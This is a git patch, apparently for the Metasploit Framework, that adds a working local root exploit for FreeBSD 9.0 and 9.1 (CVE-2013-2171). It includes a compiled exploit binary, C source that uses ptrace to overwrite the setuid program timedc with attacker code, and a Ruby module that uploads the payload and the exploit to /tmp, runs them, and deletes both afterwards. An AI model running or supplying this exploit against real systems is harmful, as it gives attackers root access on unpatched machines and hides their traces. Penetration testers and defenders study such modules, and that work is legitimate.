From 6780566a549c986304c4df49691a61e31030763c Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 24 Jun 2013 11:50:21 -0500
Subject: [PATCH] Add CVE-2013-2171: FreeBSD 9 Address Space Manipulation
 Module

---
 data/exploits/CVE-2013-2171.bin               | Bin 0 -> 6193 bytes
 .../source/exploits/CVE-2013-2171/exploit.c   |  54 +++++++++
 modules/exploits/freebsd/local/mmap.rb        | 111 ++++++++++++++++++
 3 files changed, 165 insertions(+)
 create mode 100755 data/exploits/CVE-2013-2171.bin
 create mode 100644 external/source/exploits/CVE-2013-2171/exploit.c
 create mode 100644 modules/exploits/freebsd/local/mmap.rb

diff --git a/data/exploits/CVE-2013-2171.bin b/data/exploits/CVE-2013-2171.bin
new file mode 100755
index 0000000000000000000000000000000000000000..24177a25817dad0e85c5b3e319abb395a88f7863
GIT binary patch
literal 6193
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
Gb^ix+>l&c|

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2013-2171/exploit.c b/external/source/exploits/CVE-2013-2171/exploit.c
new file mode 100644
index 0000000000..b4c027a39b
--- /dev/null
+++ b/external/source/exploits/CVE-2013-2171/exploit.c
@@ -0,0 +1,54 @@
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/ptrace.h>
+#include <sys/wait.h>
+
+#define TG "/usr/sbin/timedc"
+
+/*
+This is based on Hunger's PoC
+*/
+int main(int ac, char **av) {
+   int from_fd, to_fd, status;
+   struct stat st;
+   struct ptrace_io_desc piod;
+   char *s, *d;
+   int pid;
+   char *bin = "/tmp/W00T";  // "W00T" is just a place holder
+
+   if (geteuid() == 0)  {
+        setuid(0);
+        execl(bin, bin, NULL);
+        return 0;
+   }
+
+  from_fd = open(av[0], O_RDONLY);
+  to_fd = open(TG, O_RDONLY);
+  if ( from_fd == -1 || to_fd == -1 )                return 0;
+  if (stat(av[0], &st) == -1)                        return 0;
+
+  s = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, from_fd, (off_t)0);
+  d = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0);
+
+   if (s == MAP_FAILED || d == MAP_FAILED)           return 0;
+   if ((pid = fork()) == -1)                         return 0;
+   if (!pid) {
+        if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) return 0;
+  }
+
+   if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)        return 0;
+   if (wait(&status) == -1)                          return 0;
+
+   piod.piod_op = PIOD_WRITE_D;
+   piod.piod_offs = d;
+   piod.piod_addr = s;
+   piod.piod_len  = st.st_size;
+
+   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)  return 0;
+   execl(TG, TG, NULL);
+
+  return 0;
+}
diff --git a/modules/exploits/freebsd/local/mmap.rb b/modules/exploits/freebsd/local/mmap.rb
new file mode 100644
index 0000000000..ef08e6ea2f
--- /dev/null
+++ b/modules/exploits/freebsd/local/mmap.rb
@@ -0,0 +1,111 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+	Rank = GreatRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'FreeBSD 9 Address Space Manipulation Privilege Escalation',
+				'Description'   => %q{
+					This module exploits a vulnerability that can be used to modify portions of
+					a process's address space, which may lead to privilege escalation.  Systems
+					such as FreeBSD 9.0 and 9.1 are known to be vulnerable.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        =>
+					[
+						'Konstantin Belousov',   # Discovery
+						'Alan Cox',              # Discovery
+						'Hunger',                # POC
+						'sinn3r'                 # Metasploit
+					],
+				'Platform'      => [ 'bsd' ],
+				'Arch'          => [ ARCH_X86 ],
+				'SessionTypes'  => [ 'shell' ],
+				'References'    =>
+					[
+						[ 'CVE', '2013-2171' ],
+						[ 'OSVDB', '94414' ],
+						[ 'EDB', '26368' ],
+						[ 'BID', '60615' ],
+						[ 'URL', 'http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc' ]
+					],
+				'Targets'       =>
+					[
+						[ 'FreeBSD x86', {} ]
+					],
+				'DefaultTarget' => 0,
+				'DisclosureDate' => "Jun 18 2013",
+			}
+		))
+	end
+
+	def write_file(data, fname)
+		oct_data = "\\" + data.unpack("C*").collect {|e| e.to_s(8)} * "\\"
+		session.shell_command_token("printf \"#{oct_data}\" > #{fname}")
+		session.shell_command_token("chmod +x #{fname}")
+
+		chk = session.shell_command_token("file #{fname}")
+		return (chk =~ /ERROR: cannot open/) ? false : true
+	end
+
+	def upload_payload
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(4)}"
+		p = generate_payload_exe
+		f = write_file(p, fname)
+		return nil if not f
+		fname
+	end
+
+	def generate_exploit(payload_fname)
+		#
+		# Metasm does not support FreeBSD executable generation.
+		#
+		path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-2171.bin")
+		f    = File.open(path, 'rb')
+		x    = f.read(f.stat.size)
+		f.close
+
+		x.gsub(/W00T/, File.basename(payload_fname))
+	end
+
+	def upload_exploit(payload_fname)
+		fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
+		bin = generate_exploit(payload_fname)
+		f = write_file(bin, fname)
+		return nil if not f
+		fname
+	end
+
+	def on_new_session(cli)
+		print_warning("Removing #{@payload_fname}")
+		cli.shell_command_token("rm #{@payload_fname}")
+
+		print_warning("Removing #{@exploit_fname}")
+		cli.shell_command_token("rm #{@exploit_fname}")
+	end
+
+	def exploit
+		@payload_fname = upload_payload
+		fail_with(Exploit::Failure::NotFound, "Payload failed to upload") if @payload_fname.nil?
+		print_status("Payload #{@payload_fname} uploaded.")
+
+		@exploit_fname = upload_exploit(@payload_fname)
+		fail_with(Exploit::Failure::NotFound, "Exploit failed to upload") if @exploit_fname.nil?
+		print_status("Exploit #{@exploit_fname} uploaded.")
+
+		print_status("Executing #{@exploit_fname}")
+		cmd_exec(@exploit_fname)
+	end
+
+end